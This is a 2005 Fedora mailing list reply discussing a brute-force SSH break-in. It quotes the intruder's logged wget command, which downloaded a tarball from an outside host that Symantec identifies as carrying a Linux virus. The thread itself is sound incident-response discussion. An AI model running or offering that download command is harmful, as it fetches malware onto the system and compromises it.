brute force ssh attack

Matthew Miller mattdm at mattdm.org
Wed Apr 27 14:43:58 UTC 2005


On Wed, Apr 27, 2005 at 09:34:01AM -0500, Gustavo Seabra wrote:
> > >wget www.ring.as.ro/x/qwe.tgz
> > This is what Symantec thinks of the content of the file:
> > http://securityresponse.symantec.com/avcenter/venc/data/linux.rst.b.html
> Well, so much for the "do not wory about viruses in Linux machines"
> stories...

Cute. This is the only way I've seen Linux viruses spread (and I've seen it
before): they're infecting the precompiled binaries in toolkits used by
script kiddies. Oh, the irony.

Daniel -- did you happen to run any of the commands in the compromised user
account as root?

-- 
Matthew Miller           mattdm at mattdm.org        <http://www.mattdm.org/>
Boston University Linux      ------>                <http://linux.bu.edu/>
Current office temperature: 80 degrees Fahrenheit.




More information about the fedora-list mailing list